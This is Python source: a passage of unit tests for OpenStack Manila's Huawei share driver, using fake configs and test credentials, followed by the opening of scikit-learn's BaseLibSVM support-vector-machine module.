self.share_nfs_storagepool_fail = {
'id': 'fake_uuid',
'project_id': 'fake_tenant_id',
'display_name': 'fake',
'name': 'share-fake-uuid',
'size': 1,
'share_proto': 'NFS',
'share_network_id': 'fake_net_id',
'share_server_id': 'fake-share-srv-id',
'host': 'fake_host@fake_backend#OpenStack_Pool2',
}
def test_conf_product_fail(self):
self.recreate_fake_conf_file(product_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver.plugin.check_conf_file)
def test_conf_pool_node_fail(self):
self.recreate_fake_conf_file(pool_node_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver.plugin.check_conf_file)
def test_conf_username_fail(self):
self.recreate_fake_conf_file(username_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver.plugin.check_conf_file)
def test_conf_timeout_fail(self):
self.recreate_fake_conf_file(timeout_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
timeout = self.driver.plugin._get_timeout()
self.assertEqual(60, timeout)
def test_conf_wait_interval_fail(self):
self.recreate_fake_conf_file(wait_interval_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
wait_interval = self.driver.plugin._get_wait_interval()
self.assertEqual(3, wait_interval)
def test_get_backend_driver_fail(self):
test_fake_conf_file = None
self.driver.plugin.configuration.manila_huawei_conf_file = (
test_fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver.get_backend_driver)
def test_get_backend_driver_fail_driver_none(self):
self.recreate_fake_conf_file(product_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver.get_backend_driver)
def test_create_share_nfs_alloctype_fail(self):
self.recreate_fake_conf_file(alloctype_value='alloctype_fail')
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_nfs,
self.share_server)
def test_create_share_storagepool_not_exist(self):
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidHost,
self.driver.create_share,
self._context,
self.share_nfs_host_not_exist,
self.share_server)
def test_create_share_nfs_storagepool_fail(self):
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidHost,
self.driver.create_share,
self._context,
self.share_nfs_storagepool_fail,
self.share_server)
def test_create_share_nfs_no_data_fail(self):
self.driver.plugin.helper.create_share_data_flag = True
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_nfs,
self.share_server)
def test_read_xml_fail(self):
test_fake_conf_file = None
self.driver.plugin.configuration.manila_huawei_conf_file = (
test_fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver.plugin.helper._read_xml)
def test_connect_fail(self):
self.driver.plugin.configuration = None
self.assertRaises(exception.InvalidInput,
self.driver.plugin.connect)
def test_login_success(self):
deviceid = self.driver.plugin.helper.login()
self.assertEqual("210235G7J20000000000", deviceid)
def test_check_for_setup_success(self):
self.driver.plugin.helper.login()
self.driver.check_for_setup_error()
def test_check_for_setup_service_down(self):
self.driver.plugin.helper.service_status_flag = False
self.driver.plugin.helper.login()
self.driver.check_for_setup_error()
def test_check_for_setup_nfs_down(self):
self.driver.plugin.helper.service_nfs_status_flag = False
self.driver.plugin.helper.login()
self.driver.check_for_setup_error()
def test_check_for_setup_service_false(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.check_for_setup_error)
def test_create_share_nfs_alloctype_thin_success(self):
self.recreate_fake_conf_file(alloctype_value='Thin')
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.driver.plugin.helper.login()
location = self.driver.create_share(self._context, self.share_nfs,
self.share_server)
self.assertEqual("100.115.10.68:/share_fake_uuid", location)
def test_extend_share_success(self):
self.driver.plugin.helper.extend_share_flag = False
self.driver.plugin.helper.login()
self.driver.extend_share(self.share_nfs, 4,
self.share_server)
self.assertTrue(self.driver.plugin.helper.extend_share_flag)
def test_extend_share_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.extend_share,
self.share_nfs,
4,
self.share_server)
def test_extend_share_not_exist(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.share_exist = False
self.assertRaises(exception.InvalidShareAccess,
self.driver.extend_share,
self.share_nfs,
4,
self.share_server)
def test_create_share_nfs_success(self):
self.driver.plugin.helper.login()
location = self.driver.create_share(self._context, self.share_nfs,
self.share_server)
self.assertEqual("100.115.10.68:/share_fake_uuid", location)
def test_create_share_cifs_success(self):
self.driver.plugin.helper.login()
location = self.driver.create_share(self._context, self.share_cifs,
self.share_server)
self.assertEqual("\\\\100.115.10.68\\share_fake_uuid", location)
def test_login_fail(self):
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.plugin.helper.login)
def test_create_share_nfs_fs_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_nfs,
self.share_server)
def test_create_share_nfs_status_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.fs_status_flag = False
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_nfs,
self.share_server)
def test_create_share_cifs_fs_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_cifs,
self.share_server)
def test_create_share_cifs_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.create_share_flag = True
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_cifs,
self.share_server)
def test_create_share_nfs_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.create_share_flag = True
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_nfs,
self.share_server)
def test_delete_share_nfs_success(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.delete_flag = False
self.driver.delete_share(self._context,
self.share_nfs, self.share_server)
self.assertTrue(self.driver.plugin.helper.delete_flag)
def test_check_snapshot_id_exist_fail(self):
snapshot_id = "4"
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.plugin.helper._check_snapshot_id_exist,
snapshot_id)
def test_delete_share_nfs_fail_not_exist(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.delete_flag = False
self.driver.plugin.helper.share_exist = False
self.driver.delete_share(self._context,
self.share_nfs, self.share_server)
self.assertTrue(self.driver.plugin.helper.delete_flag)
def test_delete_share_cifs_success(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.delete_flag = False
self.driver.delete_share(self._context, self.share_cifs,
self.share_server)
self.assertTrue(self.driver.plugin.helper.delete_flag)
def test_get_network_allocations_number(self):
number = self.driver.get_network_allocations_number()
self.assertEqual(0, number)
def test_create_share_from_snapshot(self):
self.assertRaises(NotImplementedError,
self.driver.create_share_from_snapshot,
self._context, self.share_nfs, self.nfs_snapshot,
self.share_server)
def test_get_share_stats_refresh_pool_not_exist(self):
self.driver.plugin.helper.login()
self.recreate_fake_conf_file(pool_node_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver._update_share_stats)
def test_get_share_stats_refresh(self):
self.driver.plugin.helper.login()
self.driver._update_share_stats()
expected = {}
expected["share_backend_name"] = "fake_share_backend_name"
expected["driver_handles_share_servers"] = False
expected["vendor_name"] = 'Huawei'
expected["driver_version"] = '1.0'
expected["storage_protocol"] = 'NFS_CIFS'
expected['reserved_percentage'] = 0
expected['total_capacity_gb'] = 0.0
expected['free_capacity_gb'] = 0.0
expected['QoS_support'] = False
expected["pools"] = []
pool = {}
pool.update(dict(
pool_name='OpenStack_Pool',
total_capacity_gb=2,
free_capacity_gb=1,
allocated_capacity_gb=1,
QoS_support=False,
reserved_percentage=0,
))
expected["pools"].append(pool)
self.assertEqual(expected, self.driver._stats)
def test_allow_access_proto_fail(self):
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidInput,
self.driver.allow_access,
self._context,
self.share_proto_fail,
self.access_ip,
self.share_server)
def test_allow_access_ip_rw_success(self):
self.driver.plugin.helper.login()
self.allow_flag = False
self.allow_rw_flag = False
self.driver.allow_access(self._context,
self.share_nfs,
self.access_ip,
self.share_server)
self.assertTrue(self.driver.plugin.helper.allow_flag)
self.assertTrue(self.driver.plugin.helper.allow_rw_flag)
def test_allow_access_ip_ro_success(self):
access_ro = {
'access_type': 'ip',
'access_to': '1.2.3.4',
'access_level': 'ro',
}
self.driver.plugin.helper.login()
self.allow_flag = False
self.allow_ro_flag = False
self.driver.allow_access(self._context,
self.share_nfs,
access_ro,
self.share_server)
self.assertTrue(self.driver.plugin.helper.allow_flag)
self.assertTrue(self.driver.plugin.helper.allow_ro_flag)
def test_allow_access_user_rw_success(self):
self.driver.plugin.helper.login()
self.allow_flag = False
self.allow_rw_flag = False
self.driver.allow_access(self._context, self.share_cifs,
self.access_user, self.share_server)
self.assertTrue(self.driver.plugin.helper.allow_flag)
self.assertTrue(self.driver.plugin.helper.allow_rw_flag)
def test_allow_access_user_ro_success(self):
access_ro = {
'access_type': 'user',
'access_to': 'user_name',
'access_level': 'ro',
}
self.driver.plugin.helper.login()
self.allow_flag = False
self.allow_ro_flag = False
self.driver.allow_access(self._context, self.share_cifs,
access_ro, self.share_server)
self.assertTrue(self.driver.plugin.helper.allow_flag)
self.assertTrue(self.driver.plugin.helper.allow_ro_flag)
def test_allow_access_level_fail(self):
access_fail = {
'access_type': 'user',
'access_to': 'user_name',
'access_level': 'fail',
}
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidShareAccess,
self.driver.allow_access,
self._context, self.share_cifs,
access_fail, self.share_server)
def test_get_share_client_type_fail(self):
share_proto = 'fake_proto'
self.assertRaises(exception.InvalidInput,
self.driver.plugin.helper._get_share_client_type,
share_proto)
@ddt.data("NFS", "CIFS")
def test_get_share_url_type(self, share_proto):
share_url_type = self.driver.plugin.helper._get_share_url_type(
share_proto)
self.assertEqual(share_proto + 'HARE', share_url_type)
def test_get_location_path_fail(self):
share_name = 'share-fake-uuid'
share_proto = 'fake_proto'
self.assertRaises(exception.InvalidShareAccess,
self.driver.plugin._get_location_path, share_name,
share_proto)
def test_allow_access_ip_proto_fail(self):
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidShareAccess,
self.driver.allow_access, self._context,
self.share_nfs, self.access_user, self.share_server)
def test_allow_access_user_proto_fail(self):
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidShareAccess,
self.driver.allow_access, self._context,
self.share_cifs, self.access_ip, self.share_server)
def test_deny_access_ip_proto_fail(self):
self.driver.plugin.helper.login()
result = self.driver.deny_access(self._context, self.share_nfs,
self.access_user, self.share_server)
self.assertEqual(None, result)
def test_deny_access_user_proto_fail(self):
self.driver.plugin.helper.login()
result = self.driver.deny_access(self._context, self.share_cifs,
self.access_ip, self.share_server)
self.assertEqual(None, result)
def test_allow_access_ip_share_not_exist(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.share_exist = False
self.assertRaises(exception.InvalidShareAccess,
self.driver.allow_access, self._context,
self.share_nfs, self.access_ip, self.share_server)
def test_deny_access_ip_share_not_exist(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.share_exist = False
self.driver.deny_access(self._context, self.share_nfs,
self.access_ip, self.share_server)
def test_allow_access_ip_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.allow_access, self._context,
self.share_nfs, self.access_ip, self.share_server)
def test_allow_access_user_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.allow_access, self._context,
self.share_cifs, self.access_user, self.share_server)
def test_deny_access_ip_success(self):
self.driver.plugin.helper.login()
self.deny_flag = False
self.driver.deny_access(self._context, self.share_nfs,
self.access_ip, self.share_server)
self.assertTrue(self.driver.plugin.helper.deny_flag)
def test_deny_access_user_success(self):
self.driver.plugin.helper.login()
self.deny_flag = False
self.driver.deny_access(self._context, self.share_cifs,
self.access_user, self.share_server)
self.assertTrue(self.driver.plugin.helper.deny_flag)
def test_deny_access_ip_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.deny_access, self._context,
self.share_nfs, self.access_ip, self.share_server)
def test_deny_access_user_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.deny_access, self._context,
self.share_cifs, self.access_user, self.share_server)
def test_create_nfs_snapshot_success(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.create_snapflag = False
self.driver.create_snapshot(self._context, self.nfs_snapshot,
self.share_server)
self.assertTrue(self.driver.plugin.helper.create_snapflag)
def test_create_nfs_snapshot_share_not_exist(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.share_exist = False
self.assertRaises(exception.InvalidInput,
self.driver.create_snapshot, self._context,
self.nfs_snapshot, self.share_server)
def test_create_cifs_snapshot_success(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.create_snapflag = False
self.driver.create_snapshot(self._context, self.cifs_snapshot,
self.share_server)
self.assertTrue(self.driver.plugin.helper.create_snapflag)
def test_delete_snapshot_success(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.delete_flag = False
self.driver.plugin.helper.snapshot_flag = True
self.driver.delete_snapshot(self._context, self.nfs_snapshot,
self.share_server)
self.assertTrue(self.driver.plugin.helper.delete_flag)
def test_delete_snapshot_not_exist_success(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.delete_flag = False
self.driver.plugin.helper.snapshot_flag = False
self.driver.delete_snapshot(self._context, self.nfs_snapshot,
self.share_server)
self.assertTrue(self.driver.plugin.helper.delete_flag)
def test_create_nfs_snapshot_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.create_snapshot, self._context,
self.nfs_snapshot, self.share_server)
def test_create_cifs_snapshot_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.create_snapshot, self._context,
self.cifs_snapshot, self.share_server)
def test_delete_nfs_snapshot_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.delete_snapshot, self._context,
self.nfs_snapshot, self.share_server)
def test_delete_cifs_snapshot_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.delete_snapshot, self._context,
self.cifs_snapshot, self.share_server)
def test_get_pool_success(self):
self.driver.plugin.helper.login()
pool_name = self.driver.get_pool(self.share_nfs_host_not_exist)
self.assertEqual('OpenStack_Pool', pool_name)
def test_get_pool_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.share_exist = False
pool_name = self.driver.get_pool(self.share_nfs_host_not_exist)
self.assertEqual(None, pool_name)
def test_multi_resturls_success(self):
self.recreate_fake_conf_file(multi_url=True)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_multi_url_flag = 2
location = self.driver.create_share(self._context, self.share_nfs,
self.share_server)
self.assertEqual("100.115.10.68:/share_fake_uuid", location)
def test_multi_resturls_fail(self):
self.recreate_fake_conf_file(multi_url=True)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_multi_url_flag = 1
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_nfs,
self.share_server)
def create_fake_conf_file(self, fake_conf_file,
product_flag=True, username_flag=True,
pool_node_flag=True, timeout_flag=True,
wait_interval_flag=True,
alloctype_value='Thick',
multi_url=False):
doc = xml.dom.minidom.Document()
config = doc.createElement('Config')
doc.appendChild(config)
storage = doc.createElement('Storage')
config.appendChild(storage)
controllerip0 = doc.createElement('LogicalPortIP')
controllerip0_text = doc.createTextNode('100.115.10.68')
controllerip0.appendChild(controllerip0_text)
storage.appendChild(controllerip0)
if product_flag:
product_text = doc.createTextNode('V3')
else:
product_text = doc.createTextNode('V3_fail')
product = doc.createElement('Product')
product.appendChild(product_text)
storage.appendChild(product)
if username_flag:
username_text = doc.createTextNode('admin')
else:
username_text = doc.createTextNode('')
username = doc.createElement('UserName')
username.appendChild(username_text)
storage.appendChild(username)
userpassword = doc.createElement('UserPassword')
userpassword_text = doc.createTextNode('Admin@storage')
userpassword.appendChild(userpassword_text)
storage.appendChild(userpassword)
url = doc.createElement('RestURL')
if multi_url:
url_text = doc.createTextNode('http://100.115.10.69:8082/'
'deviceManager/rest/;'
'http://100.115.10.70:8082/'
'deviceManager/rest/')
else:
url_text = doc.createTextNode('http://100.115.10.69:8082/'
'deviceManager/rest/')
url.appendChild(url_text)
storage.appendChild(url)
lun = doc.createElement('Filesystem')
config.appendChild(lun)
storagepool = doc.createElement('StoragePool')
if pool_node_flag:
pool_text = doc.createTextNode('OpenStack_Pool;OpenStack_Pool2; ;')
else:
pool_text = doc.createTextNode('')
storagepool.appendChild(pool_text)
timeout = doc.createElement('Timeout')
if timeout_flag:
timeout_text = doc.createTextNode('0')
else:
timeout_text = doc.createTextNode('')
timeout.appendChild(timeout_text)
waitinterval = doc.createElement('WaitInterval')
if wait_interval_flag:
waitinterval_text = doc.createTextNode('0')
else:
waitinterval_text = doc.createTextNode('')
waitinterval.appendChild(waitinterval_text)
alloctype = doc.createElement('AllocType')
alloctype_text = doc.createTextNode(alloctype_value)
alloctype.appendChild(alloctype_text)
lun.appendChild(timeout)
lun.appendChild(alloctype)
lun.appendChild(waitinterval)
lun.appendChild(storagepool)
prefetch = doc.createElement('Prefetch')
prefetch.setAttribute('Type', '0')
prefetch.setAttribute('Value', '0')
lun.appendChild(prefetch)
fakefile = open(fake_conf_file, 'w')
fakefile.write(doc.toprettyxml(indent=''))
fakefile.close()
def recreate_fake_conf_file(self, product_flag=True, username_flag=True,
pool_node_flag=True, timeout_flag=True,
wait_interval_flag=True,
alloctype_value='Thick',
multi_url=False):
self.tmp_dir = tempfile.mkdtemp()
self.fake_conf_file = self.tmp_dir + '/manila_huawei_conf.xml'
self.addCleanup(shutil.rmtree, self.tmp_dir)
self.create_fake_conf_file(self.fake_conf_file, product_flag,
username_flag, pool_node_flag,
timeout_flag, wait_interval_flag,
alloctype_value, multi_url)
self.addCleanup(os.remove, self.fake_conf_file)
|
|
from __future__ import print_function
import numpy as np
import scipy.sparse as sp
import warnings
from abc import ABCMeta, abstractmethod
from . import libsvm, liblinear
from . import libsvm_sparse
from ..base import BaseEstimator, ClassifierMixin, ChangedBehaviorWarning
from ..preprocessing import LabelEncoder
from ..multiclass import _ovr_decision_function
from ..utils import check_array, check_random_state, column_or_1d
from ..utils import ConvergenceWarning, compute_class_weight, deprecated
from ..utils.extmath import safe_sparse_dot
from ..utils.validation import check_is_fitted
from ..externals import six
LIBSVM_IMPL = ['c_svc', 'nu_svc', 'one_class', 'epsilon_svr', 'nu_svr']
def _one_vs_one_coef(dual_coef, n_support, support_vectors):
"""Generate primal coefficients from dual coefficients
for the one-vs-one multi class LibSVM in the case
of a linear kernel."""
# get 1vs1 weights for all n*(n-1) classifiers.
# this is somewhat messy.
# shape of dual_coef_ is nSV * (n_classes -1)
# see docs for details
n_class = dual_coef.shape[0] + 1
# XXX we could do preallocation of coef but
# would have to take care in the sparse case
coef = []
sv_locs = np.cumsum(np.hstack([[0], n_support]))
for class1 in range(n_class):
# SVs for class1:
sv1 = support_vectors[sv_locs[class1]:sv_locs[class1 + 1], :]
for class2 in range(class1 + 1, n_class):
# SVs for class1:
sv2 = support_vectors[sv_locs[class2]:sv_locs[class2 + 1], :]
# dual coef for class1 SVs:
alpha1 = dual_coef[class2 - 1, sv_locs[class1]:sv_locs[class1 + 1]]
# dual coef for class2 SVs:
alpha2 = dual_coef[class1, sv_locs[class2]:sv_locs[class2 + 1]]
# build weight for class1 vs class2
coef.append(safe_sparse_dot(alpha1, sv1)
+ safe_sparse_dot(alpha2, sv2))
return coef
class BaseLibSVM(six.with_metaclass(ABCMeta, BaseEstimator)):
"""Base class for estimators that use libsvm as backing library
This implements support vector machine classification and regression.
Parameter documentation is in the derived `SVC` class.
"""
# The order of these must match the integer values in LibSVM.
# XXX These are actually the same in the dense case. Need to factor
# this out.
_sparse_kernels = ["linear", "poly", "rbf", "sigmoid", "precomputed"]
@abstractmethod
def __init__(self, impl, kernel, degree, gamma, coef0,
tol, C, nu, epsilon, shrinking, probability, cache_size,
class_weight, verbose, max_iter, random_state):
if impl not in LIBSVM_IMPL: # pragma: no cover
raise ValueError("impl should be one of %s, %s was given" % (
LIBSVM_IMPL, impl))
# FIXME Remove gamma=0.0 support in 0.18
if gamma == 0:
msg = ("gamma=%s has been deprecated in favor of "
"gamma='%s' as of 0.17. Backward compatibility"
" for gamma=%s will be removed in %s")
invalid_gamma = 0.0
warnings.warn(msg % (invalid_gamma, "auto",
invalid_gamma, "0.18"), DeprecationWarning)
self._impl = impl
self.kernel = kernel
self.degree = degree
self.gamma = gamma
self.coef0 = coef0
self.tol = tol
self.C = C
self.nu = nu
self.epsilon = epsilon
self.shrinking = shrinking
self.probability = probability
self.cache_size = cache_size
self.class_weight = class_weight
self.verbose = verbose
self.max_iter = max_iter
self.random_state = random_state
@property
def _pairwise(self):
# Used by cross_val_score.
kernel = self.kernel
return kernel == "precomputed" or callable(kernel)
def fit(self, X, y, sample_weight=None):
"""Fit the SVM model according to the given training data.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
For kernel="precomputed", the expected shape of X is
(n_samples, n_samples).
y : array-like, shape (n_samples,)
Target values (class labels in classification, real numbers in
regression)
sample_weight : array-like, shape (n_samples,)
Per-sample weights. Rescale C per sample. Higher weights
force the classifier to put more emphasis on these points.
Returns
-------
self : object
Returns self.
Notes
------
If X and y are not C-ordered and contiguous arrays of np.float64 and
X is not a scipy.sparse.csr_matrix, X and/or y may be copied.
If X is a dense array, then the other methods will not support sparse
matrices as input.
"""
rnd = check_random_state(self.random_state)
sparse = sp.isspmatrix(X)
if sparse and self.kernel == "precomputed":
raise TypeError("Sparse precomputed kernels are not supported.")
self._sparse = sparse and not callable(self.kernel)
X = check_array(X, accept_sparse='csr', dtype=np.float64, order='C')
y = self._validate_targets(y)
sample_weight = np.asarray([]
if sample_weight is None
else sample_weight, dtype=np.float64)
solver_type = LIBSVM_IMPL.index(self._impl)
# input validation
if solver_type != 2 and X.shape[0] != y.shape[0]:
raise ValueError("X and y have incompatible shapes.\n" +
"X has %s samples, but y has %s." %
(X.shape[0], y.shape[0]))
if self.kernel == "precomputed" and X.shape[0] != X.shape[1]:
raise ValueError("X.shape[0] should be equal to X.shape[1]")
if sample_weight.shape[0] > 0 and sample_weight.shape[0] != X.shape[0]:
raise ValueError("sample_weight and X have incompatible shapes: "
"%r vs %r\n"
"Note: Sparse matrices cannot be indexed w/"
"boolean masks (use `indices=True` in CV)."
% (sample_weight.shape, X.shape))
# FIXME remove (self.gamma == 0) in 0.18
if (self.kernel in ['poly', 'rbf']) and ((self.gamma == 0)
or (self.gamma == 'auto')):
# if custom gamma is not provided ...
self._gamma = 1.0 / X.shape[1]
elif self.gamma == 'auto':
self._gamma = 0.0
else:
self._gamma = self.gamma
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
fit = self._sparse_fit if self._sparse else self._dense_fit
if self.verbose: # pragma: no cover
print('[LibSVM]', end='')
seed = rnd.randint(np.iinfo('i').max)
fit(X, y, sample_weight, solver_type, kernel, random_seed=seed)
# see comment on the other call to np.iinfo in this file
self.shape_fit_ = X.shape
# In binary case, we need to flip the sign of coef, intercept and
# decision function. Use self._intercept_ and self._dual_coef_ internally.
self._intercept_ = self.intercept_.copy()
self._dual_coef_ = self.dual_coef_
if self._impl in ['c_svc', 'nu_svc'] and len(self.classes_) == 2:
self.intercept_ *= -1
self.dual_coef_ = -self.dual_coef_
return self
def _validate_targets(self, y):
"""Validation of y and class_weight.
Default implementation for SVR and one-class; overridden in BaseSVC.
"""
# XXX this is ugly.
# Regression models should not have a class_weight_ attribute.
self.class_weight_ = np.empty(0)
return np.asarray(y, dtype=np.float64, order='C')
def _warn_from_fit_status(self):
assert self.fit_status_ in (0, 1)
if self.fit_status_ == 1:
warnings.warn('Solver terminated early (max_iter=%i).'
' Consider pre-processing your data with'
' StandardScaler or MinMaxScaler.'
% self.max_iter, ConvergenceWarning)
def _dense_fit(self, X, y, sample_weight, solver_type, kernel,
random_seed):
if callable(self.kernel):
# you must store a reference to X to compute the kernel in predict
# TODO: add keyword copy to copy on demand
self.__Xfit = X
X = self._compute_kernel(X)
if X.shape[0] != X.shape[1]:
raise ValueError("X.shape[0] should be equal to X.shape[1]")
libsvm.set_verbosity_wrap(self.verbose)
# we don't pass **self.get_params() to allow subclasses to
# add other parameters to __init__
self.support_, self.support_vectors_, self.n_support_, \
self.dual_coef_, self.intercept_, self.probA_, \
self.probB_, self.fit_status_ = libsvm.fit(
X, y,
svm_type=solver_type, sample_weight=sample_weight,
class_weight=self.class_weight_, kernel=kernel, C=self.C,
nu=self.nu, probability=self.probability, degree=self.degree,
shrinking=self.shrinking, tol=self.tol,
cache_size=self.cache_size, coef0=self.coef0,
gamma=self._gamma, epsilon=self.epsilon,
max_iter=self.max_iter, random_seed=random_seed)
self._warn_from_fit_status()
def _sparse_fit(self, X, y, sample_weight, solver_type, kernel,
random_seed):
X.data = np.asarray(X.data, dtype=np.float64, order='C')
X.sort_indices()
kernel_type = self._sparse_kernels.index(kernel)
libsvm_sparse.set_verbosity_wrap(self.verbose)
self.support_, self.support_vectors_, dual_coef_data, \
self.intercept_, self.n_support_, \
self.probA_, self.probB_, self.fit_status_ = \
libsvm_sparse.libsvm_sparse_train(
X.shape[1], X.data, X.indices, X.indptr, y, solver_type,
kernel_type, self.degree, self._gamma, self.coef0, self.tol,
self.C, self.class_weight_,
sample_weight, self.nu, self.cache_size, self.epsilon,
int(self.shrinking), int(self.probability), self.max_iter,
random_seed)
self._warn_from_fit_status()
if hasattr(self, "classes_"):
n_class = len(self.classes_) - 1
else: # regression
n_class = 1
n_SV = self.support_vectors_.shape[0]
dual_coef_indices = np.tile(np.arange(n_SV), n_class)
dual_coef_indptr = np.arange(0, dual_coef_indices.size + 1,
dual_coef_indices.size / n_class)
self.dual_coef_ = sp.csr_matrix(
(dual_coef_data, dual_coef_indices, dual_coef_indptr),
(n_class, n_SV))
def predict(self, X):
"""Perform regression on samples in X.
For an one-class model, +1 or -1 is returned.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
(n_samples_test, n_samples_train).
Returns
-------
y_pred : array, shape (n_samples,)
"""
X = self._validate_for_predict(X)
predict = self._sparse_predict if self._sparse else self._dense_predict
return predict(X)
def _dense_predict(self, X):
n_samples, n_features = X.shape
X = self._compute_kernel(X)
if X.ndim == 1:
X = check_array(X, order='C')
kernel = self.kernel
if callable(self.kernel):
kernel = 'precomputed'
if X.shape[1] != self.shape_fit_[0]:
raise ValueError("X.shape[1] = %d should be equal to %d, "
"the number of samples at training time" %
(X.shape[1], self.shape_fit_[0]))
svm_type = LIBSVM_IMPL.index(self._impl)
return libsvm.predict(
X, self.support_, self.support_vectors_, self.n_support_,
self._dual_coef_, self._intercept_,
self.probA_, self.probB_, svm_type=svm_type, kernel=kernel,
degree=self.degree, coef0=self.coef0, gamma=self._gamma,
cache_size=self.cache_size)
def _sparse_predict(self, X):
# Precondition: X is a csr_matrix of dtype np.float64.
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
kernel_type = self._sparse_kernels.index(kernel)
C = 0.0 # C is not useful here
return libsvm_sparse.libsvm_sparse_predict(
X.data, X.indices, X.indptr,
self.support_vectors_.data,
self.support_vectors_.indices,
self.support_vectors_.indptr,
self._dual_coef_.data, self._intercept_,
LIBSVM_IMPL.index(self._impl), kernel_type,
self.degree, self._gamma, self.coef0, self.tol,
C, self.class_weight_,
self.nu, self.epsilon, self.shrinking,
self.probability, self.n_support_,
self.probA_, self.probB_)
def _compute_kernel(self, X):
"""Return the data transformed by a callable kernel"""
if callable(self.kernel):
# in the case of precomputed kernel given as a function, we
# have to compute explicitly the kernel matrix
kernel = self.kernel(X, self.__Xfit)
if sp.issparse(kernel):
kernel = kernel.toarray()
X = np.asarray(kernel, dtype=np.float64, order='C')
return X
@deprecated(" and will be removed in 0.19")
def decision_function(self, X):
"""Distance of the samples X to the separating hyperplane.
Parameters
----------
X : array-like, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
[n_samples_test, n_samples_train].
Returns
-------
X : array-like, shape (n_samples, n_class * (n_class-1) / 2)
Returns the decision function of the sample for each class
in the model.
"""
return self._decision_function(X)
def _decision_function(self, X):
"""Distance of the samples X to the separating hyperplane.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Returns
-------
X : array-like, shape (n_samples, n_class * (n_class-1) / 2)
Returns the decision function of the sample for each class
in the model.
"""
